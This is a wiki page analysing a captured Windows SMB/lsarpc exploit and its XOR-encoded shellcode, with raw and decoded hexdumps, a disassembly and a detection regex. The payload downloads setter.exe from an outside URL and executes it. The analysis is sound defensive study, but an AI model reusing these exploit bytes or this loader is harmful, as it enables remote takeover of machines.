[[csni:shellcodes:rosengarten]]
 
Trace: home » csni » shellcodes » rosengarten
Table of Contents

Rosengarten Shellcode

file csni:shellcodes:rosengarten:rosengarten.bin

Shellcode

raw

hexdump 

00000000  00 00 00 a4 ff 53 4d 42  73 00 00 00 00 18 07 c8  |...€ÿSMBs......È|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 ff fe  |..............ÿþ|
00000020  00 00 10 00 0c ff 00 a4  00 04 11 0a 00 00 00 00  |.....ÿ.€........|
00000030  00 00 00 20 00 00 00 00  00 d4 00 00 80 69 00 4e  |... .....Ô...i.N|
00000040  54 4c 4d 53 53 50 00 01  00 00 00 97 82 08 e0 00  |TLMSSP........à.|
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000060  57 00 69 00 6e 00 64 00  6f 00 77 00 73 00 20 00  |W.i.n.d.o.w.s. .|
00000070  32 00 30 00 30 00 30 00  20 00 32 00 31 00 39 00  |2.0.0.0. .2.1.9.|
00000080  35 00 00 00 57 00 69 00  6e 00 64 00 6f 00 77 00  |5...W.i.n.d.o.w.|
00000090  73 00 20 00 32 00 30 00  30 00 30 00 20 00 35 00  |s. .2.0.0.0. .5.|
000000a0  2e 00 30 00 00 00 00 00  00 00 00 da ff 53 4d 42  |..0........ÚÿSMB|
000000b0  73 00 00 00 00 18 07 c8  00 00 00 00 00 00 00 00  |s......È........|
000000c0  00 00 00 00 00 00 ff fe  00 08 20 00 0c ff 00 da  |......ÿþ.. ..ÿ.Ú|
000000d0  00 04 11 0a 00 00 00 00  00 00 00 57 00 00 00 00  |...........W....|
000000e0  00 d4 00 00 80 9f 00 4e  54 4c 4d 53 53 50 00 03  |.Ô.....NTLMSSP..|
000000f0  00 00 00 01 00 01 00 46  00 00 00 00 00 00 00 47  |.......F.......G|
00000100  00 00 00 00 00 00 00 40  00 00 00 00 00 00 00 40  |.......@.......@|
00000110  00 00 00 06 00 06 00 40  00 00 00 10 00 10 00 47  |.......@.......G|
00000120  00 00 00 15 8a 88 e0 48  00 4f 00 44 00 00 81 19  |......àH.O.D....|
00000130  6a 7a f2 e4 49 1c 28 af  30 25 74 10 67 53 57 00  |jzòäI.(¯0%t.gSW.|
00000140  69 00 6e 00 64 00 6f 00  77 00 73 00 20 00 32 00  |i.n.d.o.w.s. .2.|
00000150  30 00 30 00 30 00 20 00  32 00 31 00 39 00 35 00  |0.0.0. .2.1.9.5.|
00000160  00 00 57 00 69 00 6e 00  64 00 6f 00 77 00 73 00  |..W.i.n.d.o.w.s.|
00000170  20 00 32 00 30 00 30 00  30 00 20 00 35 00 2e 00  | .2.0.0.0. .5...|
00000180  30 00 00 00 00 00 00 00  00 60 ff 53 4d 42 75 00  |0........`ÿSMBu.|
00000190  00 00 00 18 07 c8 00 00  00 00 00 00 00 00 00 00  |.....È..........|
000001a0  00 00 00 00 ff fe 00 08  30 00 04 ff 00 5c 00 08  |....ÿþ..0..ÿ.\..|
000001b0  00 01 00 35 00 00 5c 00  5c 00 31 00 33 00 34 00  |...5..\.\.1.3.4.|
000001c0  2e 00 31 00 33 00 30 00  2e 00 31 00 37 00 34 00  |..1.3.0...1.7.4.|
000001d0  2e 00 31 00 36 00 37 00  5c 00 69 00 70 00 63 00  |..1.6.7.\.i.p.c.|
000001e0  24 00 00 00 3f 3f 3f 3f  3f 00 00 00 00 64 ff 53  |$...?????....dÿS|
000001f0  4d 42 a2 00 00 00 00 18  07 c8 00 00 00 00 00 00  |MB¢......È......|
00000200  00 00 00 00 00 00 00 08  dc 04 00 08 40 00 18 ff  |........Ü...@..ÿ|
00000210  00 de de 00 0e 00 16 00  00 00 00 00 00 00 9f 01  |.ÞÞ.............|
00000220  02 00 00 00 00 00 00 00  00 00 00 00 00 00 03 00  |................|
00000230  00 00 01 00 00 00 40 00  00 00 02 00 00 00 03 11  |......@.........|
00000240  00 00 5c 00 6c 00 73 00  61 00 72 00 70 00 63 00  |..\.l.s.a.r.p.c.|
00000250  00 00 00 00 00 9c ff 53  4d 42 25 00 00 00 00 18  |......ÿSMB%.....|
00000260  07 c8 00 00 00 00 00 00  00 00 00 00 00 00 00 08  |.È..............|
00000270  dc 04 00 08 50 00 10 00  00 48 00 00 00 00 04 00  |Ü...P....H......|
00000280  00 00 00 00 00 00 00 00  00 00 00 54 00 48 00 54  |...........T.H.T|
00000290  00 02 00 26 00 00 40 59  00 10 5c 00 50 00 49 00  |...&..@Y..\.P.I.|
000002a0  50 00 45 00 5c 00 00 00  00 00 05 00 0b 03 10 00  |P.E.\...........|
000002b0  00 00 48 00 00 00 01 00  00 00 b8 10 b8 10 00 00  |..H.......ž.ž...|
000002c0  00 00 01 00 00 00 00 00  01 00 6a 28 19 39 0c b1  |..........j(.9.±|
000002d0  d0 11 9b a8 00 c0 4f d9  2e f5 00 00 00 00 04 5d  |Ð..š.ÀOÙ.õ.....]|
000002e0  88 8a eb 1c c9 11 9f e8  08 00 2b 10 48 60 02 00  |..ë.É..è..+.H`..|
000002f0  00 00 00 00 0c f4 ff 53  4d 42 25 00 00 00 00 18  |.....ôÿSMB%.....|
00000300  07 c8 00 00 00 00 00 00  00 00 00 00 00 00 00 08  |.È..............|
00000310  dc 04 00 08 60 00 10 00  00 a0 0c 00 00 00 04 00  |Ü...`.... ......|
00000320  00 00 00 00 00 00 00 00  00 00 00 54 00 a0 0c 54  |...........T. .T|
00000330  00 02 00 26 00 00 40 b1  0c 10 5c 00 50 00 49 00  |...&..@±..\.P.I.|
00000340  50 00 45 00 5c 00 00 00  00 00 05 00 00 03 10 00  |P.E.\...........|
00000350  00 00 a0 0c 00 00 01 00  00 00 88 0c 00 00 00 00  |.. .............|
00000360  09 00 ec 03 00 00 00 00  00 00 ec 03 00 00 90 90  |..ì.......ì.....|
00000370  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000400  90 90 90 90 90 90 90 90  90 90 90 90 90 90 33 c0  |..............3À|
00000410  f7 d0 8b fc f2 af 57 33  c9 b1 cb 90 90 90 90 80  |÷Ð.üò¯W3ɱË.....|
00000420  37 ff 47 e2 fa 8b ef 4d  5f 57 b8 9e 26 18 88 f7  |7ÿGâú.ïM_Wž.&..÷|
00000430  d0 ff d0 8b d8 be f8 ff  ff ff f7 d6 33 c0 8b c8  |ÐÿÐ.ØŸøÿÿÿ÷Ö3À.È|
00000440  f7 d1 f2 ae 57 53 b8 cd  4c 18 88 f7 d0 ff d0 3e  |÷Ñò®WSžÍL..÷ÐÿÐ>|
00000450  89 44 b5 fd 4e 0b f6 75  e3 33 c0 8b c8 f7 d1 f2  |.DµýN.öuã3À.È÷Ñò|
00000460  ae 57 b8 9e 26 18 88 f7  d0 ff d0 8b d8 be f5 ff  |®Wž.&..÷ÐÿÐ.ØŸõÿ|
00000470  ff ff f7 d6 ba f8 ff ff  ff f7 d2 52 33 c0 8b c8  |ÿÿ÷Öºøÿÿÿ÷ÒR3À.È|
00000480  f7 d1 f2 ae 57 53 b8 cd  4c 18 88 f7 d0 ff d0 3e  |÷Ñò®WSžÍL..÷ÐÿÐ>|
00000490  89 44 b5 fd 5a 52 4e 3b  f2 75 e1 33 c0 8b c8 f7  |.DµýZRN;òuá3À.È÷|
000004a0  d1 f2 ae 90 90 33 c0 66  48 d1 e0 33 d2 50 52 ff  |Ñò®..3ÀfHÑà3ÒPRÿ|
000004b0  55 01 8b f0 33 d2 52 52  52 52 57 ff 55 25 33 d2  |U..ð3ÒRRRRWÿU%3Ò|
000004c0  52 52 52 52 8b d7 90 90  90 52 50 ff 55 21 57 33  |RRRR.×...RPÿU!W3|
000004d0  d2 66 4a d1 e2 52 56 50  ff 55 1d 90 90 90 33 d2  |ÒfJÑâRVPÿU....3Ò|
000004e0  52 b8 f4 ff ff ff f7 d0  8b d5 2b d0 42 90 90 52  |Ržôÿÿÿ÷Ð.Õ+ÐB..R|
000004f0  ff 55 19 ff 37 56 50 8b  d8 ff 55 15 53 ff 55 11  |ÿU.ÿ7VP.ØÿU.SÿU.|
00000500  90 90 90 90 90 33 d2 42  52 b8 f4 ff ff ff f7 d0  |.....3ÒBRžôÿÿÿ÷Ð|
00000510  8b d5 2b d0 42 90 90 90  52 ff 55 09 90 ff 55 05  |.Õ+ÐB...RÿU..ÿU.|
00000520  90 ff ff ff ff b4 ba ad  b1 ba b3 cc cd d1 bb b3  |.ÿÿÿÿŽº­±º³ÌÍÑ»³|
00000530  b3 ff a0 93 9c 8d 9a 9e  8b ff a0 93 88 8d 96 8b  |³ÿ ......ÿ .....|
00000540  9a ff a0 93 9c 93 90 8c  9a ff a0 93 9c 93 90 8c  |.ÿ ......ÿ .....|
00000550  9a ff a8 96 91 ba 87 9a  9c ff ba 87 96 8b af 8d  |.ÿš..º...ÿº...¯.|
00000560  90 9c 9a 8c 8c ff b8 93  90 9d 9e 93 be 93 93 90  |.....ÿž.....Ÿ...|
00000570  9c ff a8 b6 b1 b6 b1 ba  ab d1 bb b3 b3 ff b6 91  |.ÿš¶±¶±º«Ñ»³³ÿ¶.|
00000580  8b 9a 8d 91 9a 8b b0 8f  9a 91 be ff b6 91 8b 9a  |......°...Ÿÿ¶...|
00000590  8d 91 9a 8b b0 8f 9a 91  aa 8d 93 be ff b6 91 8b  |....°...ª..Ÿÿ¶..|
000005a0  9a 8d 91 9a 8b ad 9a 9e  9b b9 96 93 9a ff 97 8b  |.....­...¹...ÿ..|
000005b0  8b 8f c5 d0 d0 8c 9c d1  89 96 8d 8b 8a 9e 93 98  |..ÅÐÐ..Ñ........|
000005c0  9e 92 9a 85 d2 85 90 91  9a d1 9c 90 92 d0 9c 98  |....Ò....Ñ...Ð..|
000005d0  96 d2 9d 96 91 d0 9c 98  96 a0 8f 8d 90 87 86 c0  |.Ò...Ð... .....À|
000005e0  93 9b 8d cd ff 8c 9a 8b  8b 9a 8d d1 9a 87 9a ff  |...Íÿ......Ñ...ÿ|
000005f0  88 88 88 88 88 88 88 88  88 88 88 88 88 88 88 88  |................|
*
00000610  88 88 88 88 88 88 88 88  ff 90 90 90 90 90 90 90  |........ÿ.......|
00000620  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000b10  90 90 90 90 90 90 90 90  90 90 cc 59 fb 77 90 90  |..........ÌYûw..|
00000b20  90 90 90 90 90 90 90 90  90 90 66 81 ec 1c 07 ff  |..........f.ì..ÿ|
00000b30  e4 90 90 90 90 90 90 90  90 90 90 90 90 90 95 14  |ä...............|
00000b40  40 00 03 00 00 00 7c 70  40 00 01 00 00 00 00 00  |@.....|p@.......|
00000b50  00 00 01 00 00 00 00 00  00 00 01 00 00 00 00 00  |................|
*
00000b80  00 00 01 00 00 00 00 00  00 00 7c 70 40 00 01 00  |..........|p@...|
00000b90  00 00 00 00 00 00 01 00  00 00 00 00 00 00 7c 70  |..............|p|
00000ba0  40 00 01 00 00 00 00 00  00 00 01 00 00 00 00 00  |@...............|
00000bb0  00 00 7c 70 40 00 01 00  00 00 00 00 00 00 01 00  |..|p@...........|
00000bc0  00 00 00 00 00 00 78 85  13 00 ab 5b a6 e9 31 31  |......x...«[Šé11|
00000bd0  31 31 31 31 31 31 31 31  31 31 31 31 31 31 31 31  |1111111111111111|
*
00000fe0  31 31 31 31 31 31 31 31  31 00                    |111111111.|
00000fea

unxor'd 

00000000  00 00 00 a4 ff 53 4d 42  73 00 00 00 00 18 07 c8  |...€ÿSMBs......È|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 ff fe  |..............ÿþ|
00000020  00 00 10 00 0c ff 00 a4  00 04 11 0a 00 00 00 00  |.....ÿ.€........|
00000030  00 00 00 20 00 00 00 00  00 d4 00 00 80 69 00 4e  |... .....Ô...i.N|
00000040  54 4c 4d 53 53 50 00 01  00 00 00 97 82 08 e0 00  |TLMSSP........à.|
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000060  57 00 69 00 6e 00 64 00  6f 00 77 00 73 00 20 00  |W.i.n.d.o.w.s. .|
00000070  32 00 30 00 30 00 30 00  20 00 32 00 31 00 39 00  |2.0.0.0. .2.1.9.|
00000080  35 00 00 00 57 00 69 00  6e 00 64 00 6f 00 77 00  |5...W.i.n.d.o.w.|
00000090  73 00 20 00 32 00 30 00  30 00 30 00 20 00 35 00  |s. .2.0.0.0. .5.|
000000a0  2e 00 30 00 00 00 00 00  00 00 00 da ff 53 4d 42  |..0........ÚÿSMB|
000000b0  73 00 00 00 00 18 07 c8  00 00 00 00 00 00 00 00  |s......È........|
000000c0  00 00 00 00 00 00 ff fe  00 08 20 00 0c ff 00 da  |......ÿþ.. ..ÿ.Ú|
000000d0  00 04 11 0a 00 00 00 00  00 00 00 57 00 00 00 00  |...........W....|
000000e0  00 d4 00 00 80 9f 00 4e  54 4c 4d 53 53 50 00 03  |.Ô.....NTLMSSP..|
000000f0  00 00 00 01 00 01 00 46  00 00 00 00 00 00 00 47  |.......F.......G|
00000100  00 00 00 00 00 00 00 40  00 00 00 00 00 00 00 40  |.......@.......@|
00000110  00 00 00 06 00 06 00 40  00 00 00 10 00 10 00 47  |.......@.......G|
00000120  00 00 00 15 8a 88 e0 48  00 4f 00 44 00 00 81 19  |......àH.O.D....|
00000130  6a 7a f2 e4 49 1c 28 af  30 25 74 10 67 53 57 00  |jzòäI.(¯0%t.gSW.|
00000140  69 00 6e 00 64 00 6f 00  77 00 73 00 20 00 32 00  |i.n.d.o.w.s. .2.|
00000150  30 00 30 00 30 00 20 00  32 00 31 00 39 00 35 00  |0.0.0. .2.1.9.5.|
00000160  00 00 57 00 69 00 6e 00  64 00 6f 00 77 00 73 00  |..W.i.n.d.o.w.s.|
00000170  20 00 32 00 30 00 30 00  30 00 20 00 35 00 2e 00  | .2.0.0.0. .5...|
00000180  30 00 00 00 00 00 00 00  00 60 ff 53 4d 42 75 00  |0........`ÿSMBu.|
00000190  00 00 00 18 07 c8 00 00  00 00 00 00 00 00 00 00  |.....È..........|
000001a0  00 00 00 00 ff fe 00 08  30 00 04 ff 00 5c 00 08  |....ÿþ..0..ÿ.\..|
000001b0  00 01 00 35 00 00 5c 00  5c 00 31 00 33 00 34 00  |...5..\.\.1.3.4.|
000001c0  2e 00 31 00 33 00 30 00  2e 00 31 00 37 00 34 00  |..1.3.0...1.7.4.|
000001d0  2e 00 31 00 36 00 37 00  5c 00 69 00 70 00 63 00  |..1.6.7.\.i.p.c.|
000001e0  24 00 00 00 3f 3f 3f 3f  3f 00 00 00 00 64 ff 53  |$...?????....dÿS|
000001f0  4d 42 a2 00 00 00 00 18  07 c8 00 00 00 00 00 00  |MB¢......È......|
00000200  00 00 00 00 00 00 00 08  dc 04 00 08 40 00 18 ff  |........Ü...@..ÿ|
00000210  00 de de 00 0e 00 16 00  00 00 00 00 00 00 9f 01  |.ÞÞ.............|
00000220  02 00 00 00 00 00 00 00  00 00 00 00 00 00 03 00  |................|
00000230  00 00 01 00 00 00 40 00  00 00 02 00 00 00 03 11  |......@.........|
00000240  00 00 5c 00 6c 00 73 00  61 00 72 00 70 00 63 00  |..\.l.s.a.r.p.c.|
00000250  00 00 00 00 00 9c ff 53  4d 42 25 00 00 00 00 18  |......ÿSMB%.....|
00000260  07 c8 00 00 00 00 00 00  00 00 00 00 00 00 00 08  |.È..............|
00000270  dc 04 00 08 50 00 10 00  00 48 00 00 00 00 04 00  |Ü...P....H......|
00000280  00 00 00 00 00 00 00 00  00 00 00 54 00 48 00 54  |...........T.H.T|
00000290  00 02 00 26 00 00 40 59  00 10 5c 00 50 00 49 00  |...&..@Y..\.P.I.|
000002a0  50 00 45 00 5c 00 00 00  00 00 05 00 0b 03 10 00  |P.E.\...........|
000002b0  00 00 48 00 00 00 01 00  00 00 b8 10 b8 10 00 00  |..H.......ž.ž...|
000002c0  00 00 01 00 00 00 00 00  01 00 6a 28 19 39 0c b1  |..........j(.9.±|
000002d0  d0 11 9b a8 00 c0 4f d9  2e f5 00 00 00 00 04 5d  |Ð..š.ÀOÙ.õ.....]|
000002e0  88 8a eb 1c c9 11 9f e8  08 00 2b 10 48 60 02 00  |..ë.É..è..+.H`..|
000002f0  00 00 00 00 0c f4 ff 53  4d 42 25 00 00 00 00 18  |.....ôÿSMB%.....|
00000300  07 c8 00 00 00 00 00 00  00 00 00 00 00 00 00 08  |.È..............|
00000310  dc 04 00 08 60 00 10 00  00 a0 0c 00 00 00 04 00  |Ü...`.... ......|
00000320  00 00 00 00 00 00 00 00  00 00 00 54 00 a0 0c 54  |...........T. .T|
00000330  00 02 00 26 00 00 40 b1  0c 10 5c 00 50 00 49 00  |...&..@±..\.P.I.|
00000340  50 00 45 00 5c 00 00 00  00 00 05 00 00 03 10 00  |P.E.\...........|
00000350  00 00 a0 0c 00 00 01 00  00 00 88 0c 00 00 00 00  |.. .............|
00000360  09 00 ec 03 00 00 00 00  00 00 ec 03 00 00 90 90  |..ì.......ì.....|
00000370  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000520  90 90 90 90 90 4b 45 52  4e 45 4c 33 32 2e 44 4c  |.....KERNEL32.DL|
00000530  4c 00 5f 6c 63 72 65 61  74 00 5f 6c 77 72 69 74  |L._lcreat._lwrit|
00000540  65 00 5f 6c 63 6c 6f 73  65 00 5f 6c 63 6c 6f 73  |e._lclose._lclos|
00000550  65 00 57 69 6e 45 78 65  63 00 45 78 69 74 50 72  |e.WinExec.ExitPr|
00000560  6f 63 65 73 73 00 47 6c  6f 62 61 6c 41 6c 6c 6f  |ocess.GlobalAllo|
00000570  63 00 57 49 4e 49 4e 45  54 2e 44 4c 4c 00 49 6e  |c.WININET.DLL.In|
00000580  74 65 72 6e 65 74 4f 70  65 6e 41 00 49 6e 74 65  |ternetOpenA.Inte|
00000590  72 6e 65 74 4f 70 65 6e  55 72 6c 41 00 49 6e 74  |rnetOpenUrlA.Int|
000005a0  65 72 6e 65 74 52 65 61  64 46 69 6c 65 00 68 74  |ernetReadFile.ht|
000005b0  74 70 3a 2f 2f 73 63 2e  76 69 72 74 75 61 6c 67  |tp://sc.virtualg|
000005c0  61 6d 65 7a 2d 7a 6f 6e  65 2e 63 6f 6d 2f 63 67  |amez-zone.com/cg|
000005d0  69 2d 62 69 6e 2f 63 67  69 5f 70 72 6f 78 79 3f  |i-bin/cgi_proxy?|
000005e0  6c 64 72 32 00 73 65 74  74 65 72 2e 65 78 65 00  |ldr2.setter.exe.|
000005f0  88 88 88 88 88 88 88 88  88 88 88 88 88 88 88 88  |................|
*
00000610  88 88 88 88 88 88 88 88  ff 90 90 90 90 90 90 90  |........ÿ.......|
00000620  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000b10  90 90 90 90 90 90 90 90  90 90 cc 59 fb 77 90 90  |..........ÌYûw..|
00000b20  90 90 90 90 90 90 90 90  90 90 66 81 ec 1c 07 ff  |..........f.ì..ÿ|
00000b30  e4 90 90 90 90 90 90 90  90 90 90 90 90 90 95 14  |ä...............|
00000b40  40 00 03 00 00 00 7c 70  40 00 01 00 00 00 00 00  |@.....|p@.......|
00000b50  00 00 01 00 00 00 00 00  00 00 01 00 00 00 00 00  |................|
*
00000b80  00 00 01 00 00 00 00 00  00 00 7c 70 40 00 01 00  |..........|p@...|
00000b90  00 00 00 00 00 00 01 00  00 00 00 00 00 00 7c 70  |..............|p|
00000ba0  40 00 01 00 00 00 00 00  00 00 01 00 00 00 00 00  |@...............|
00000bb0  00 00 7c 70 40 00 01 00  00 00 00 00 00 00 01 00  |..|p@...........|
00000bc0  00 00 00 00 00 00 78 85  13 00 ab 5b a6 e9 31 31  |......x...«[Šé11|
00000bd0  31 31 31 31 31 31 31 31  31 31 31 31 31 31 31 31  |1111111111111111|
*
00000fe0  31 31 31 31 31 31 31 31  31 00                    |111111111.|
00000fea

Analysis

XOR decoder "rosengarten data only xor"

0000040E                 xor     eax, eax
00000410                 not     eax
00000412                 mov     edi, esp
00000414                 repne scasd             ; search for 0xFFFFFFFF in shellcode
00000416                 push    edi
00000417                 xor     ecx, ecx
00000419                 mov     cl, 0CBh ; '-'
0000041B                 nop
0000041C                 nop
0000041D                 nop
0000041E                 nop
0000041F
0000041F loc_41F:
0000041F                 xor     byte ptr [edi], 0FFh
00000422                 inc     edi
00000423                 loop    loc_41F

Shellcode with unxor'd data 

00000425                 mov     ebp, edi
00000427                 dec     ebp
00000428                 pop     edi
00000429                 push    edi
0000042A                 mov     eax, 8818269Eh
0000042F                 not     eax             ; 77E7D961 = LoadLibraryA
00000431                 call    eax
00000433                 mov     ebx, eax
00000435                 mov     esi, 0FFFFFFF8h
0000043A                 not     esi
0000043C
0000043C loc_43C:
0000043C                 xor     eax, eax
0000043E                 mov     ecx, eax
00000440                 not     ecx
00000442                 repne scasb
00000444                 push    edi
00000445                 push    ebx
00000446                 mov     eax, 88184CCDh
0000044B                 not     eax             ; 77E7B332 = GetProcAddress
0000044D                 call    eax
0000044F                 mov     ds:[ebp+esi*4-3], eax
00000454                 dec     esi
00000455                 or      esi, esi
00000457                 jnz     short loc_43C
00000459                 xor     eax, eax
0000045B                 mov     ecx, eax
0000045D                 not     ecx
0000045F                 repne scasb
00000461                 push    edi
00000462                 mov     eax, 8818269Eh
00000467                 not     eax             ; 77E7D961 = LoadLibraryA
00000469                 call    eax
0000046B                 mov     ebx, eax
0000046D                 mov     esi, 0FFFFFFF5h
00000472                 not     esi
00000474                 mov     edx, 0FFFFFFF8h
00000479                 not     edx
0000047B                 push    edx
0000047C
0000047C loc_47C:
0000047C                 xor     eax, eax
0000047E                 mov     ecx, eax
00000480                 not     ecx
00000482                 repne scasb
00000484                 push    edi
00000485                 push    ebx
00000486                 mov     eax, 88184CCDh
0000048B                 not     eax             ; 77E7B332 = GetProcAddress
0000048D                 call    eax
0000048F                 mov     ds:[ebp+esi*4-3], eax
00000494                 pop     edx
00000495                 push    edx
00000496                 dec     esi
00000497                 cmp     esi, edx
00000499                 jnz     short loc_47C
0000049B                 xor     eax, eax
0000049D                 mov     ecx, eax
0000049F                 not     ecx
000004A1                 repne scasb
000004A3                 nop
000004A4                 nop
000004A5                 xor     eax, eax
000004A7                 dec     ax
000004A9                 shl     eax, 1
000004AB                 xor     edx, edx
000004AD                 push    eax             ; 131070
000004AE                 push    edx
000004AF                 call    dword ptr [ebp+1] ; GlobalAlloc
000004B2                 mov     esi, eax
000004B4                 xor     edx, edx
000004B6                 push    edx
000004B7                 push    edx
000004B8                 push    edx
000004B9                 push    edx
000004BA                 push    edi             ; edi points to aHttpSc_virtual
000004BA                                         ; here used as agent
000004BA                                         ; and es URL for InternetOpenURLA
000004BB                 call    dword ptr [ebp+25h] ; InternetOpenA
000004BE                 xor     edx, edx
000004C0                 push    edx
000004C1                 push    edx
000004C2                 push    edx
000004C3                 push    edx
000004C4                 mov     edx, edi
000004C6                 nop
000004C7                 nop
000004C8                 nop
000004C9                 push    edx
000004CA                 push    eax
000004CB                 call    dword ptr [ebp+21h] ; InternetOpenURLA
000004CE                 push    edi
000004CF                 xor     edx, edx
000004D1                 dec     dx
000004D3                 shl     edx, 1
000004D5                 push    edx
000004D6                 push    esi
000004D7                 push    eax
000004D8                 call    dword ptr [ebp+1Dh] ; InternetReadFile
000004DB                 nop
000004DC                 nop
000004DD                 nop
000004DE                 xor     edx, edx
000004E0                 push    edx
000004E1                 mov     eax, 0FFFFFFF4h
000004E6                 not     eax
000004E8                 mov     edx, ebp
000004EA                 sub     edx, eax
000004EC                 inc     edx             ; ebp-B+1 = 5E5 = offset of aSetter_exe
000004ED                 nop
000004EE                 nop
000004EF                 push    edx
000004F0                 call    dword ptr [ebp+19h] ; create and write setter.exe
000004F3                 push    dword ptr [edi]
000004F5                 push    esi
000004F6                 push    eax
000004F7                 mov     ebx, eax
000004F9                 call    dword ptr [ebp+15h] ; _lwrite
000004FC                 push    ebx
000004FD                 call    dword ptr [ebp+11h] ; _lclose
00000500                 nop
00000501                 nop
00000502                 nop
00000503                 nop
00000504                 nop
00000505                 xor     edx, edx
00000507                 inc     edx
00000508                 push    edx
00000509                 mov     eax, 0FFFFFFF4h
0000050E                 not     eax
00000510                 mov     edx, ebp
00000512                 sub     edx, eax
00000514                 inc     edx
00000515                 nop
00000516                 nop
00000517                 nop
00000518                 push    edx
00000519                 call    dword ptr [ebp+9] ; execute setter.exe
0000051C                 nop
0000051D                 call    dword ptr [ebp+5] ; ExitProcess
00000520                 nop
00000520 ; ---------------------------------------------------------------------------
00000521                 dd FFFFFFFFh              ; This is the FFFFFFFFh the decoder is looking for
00000525 aKernel32_dll   db 'KERNEL32.DLL',0
00000532 a_lcreat        db '_lcreat',0
0000053A a_lwrite        db '_lwrite',0
00000542 a_lclose        db '_lclose',0
0000054A a_lclose_0      db '_lclose',0
00000552 aWinexec        db 'WinExec',0
0000055A aExitprocess    db 'ExitProcess',0
00000566 aGlobalalloc    db 'GlobalAlloc',0
00000572 aWininet_dll    db 'WININET.DLL',0
0000057E aInternetopena  db 'InternetOpenA',0
0000058C aInternetopenur db 'InternetOpenUrlA',0
0000059D aInternetreadfi db 'InternetReadFile',0
000005AE aHttpSc_virtual db 'http://sc.virtualgamez-zone.com/cgi-bin/cgi_proxy?ldr2',0
000005E5 aSetter_exe     db 'setter.exe',0
000005F0 GlobalAlloc     dd 88888888h            ; ebp+01
000005F4 ExitProcess     dd 88888888h            ; ebp+05
000005F8 WinExec         dd 88888888h            ; ebp+09
000005FC _lclose_0       dd 88888888h            ; ebp+0D
00000600 _lclose         dd 88888888h            ; ebp+11
00000604 _lwrite         dd 88888888h            ; ebp+15
00000608 _lcreat         dd 88888888h            ; ebp+19
0000060C InternetReadFile dd 88888888h           ; ebp+1D
00000610 InternetOpenURLA dd 88888888h           ; ebp+21
00000614 InternetOpenA   dd 88888888h            ; ebp+25

shellcode patterns

xor 

"(.*)(\\x33\\xC0\\xF7\\xD0\\x8B\\xFC\\xF2\\xAF\\x57\\x33\\xC9\\xB1(.)\\x90\\x90\\x90\\x90\\x80\\x37(.)\\x47"
"\\xE2\\xFA.*\\xFF\\xFF\\xFF\\xFF)(.*)$",
 
csni/shellcodes/rosengarten.txt · Last modified: 2006/02/17 14:01
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki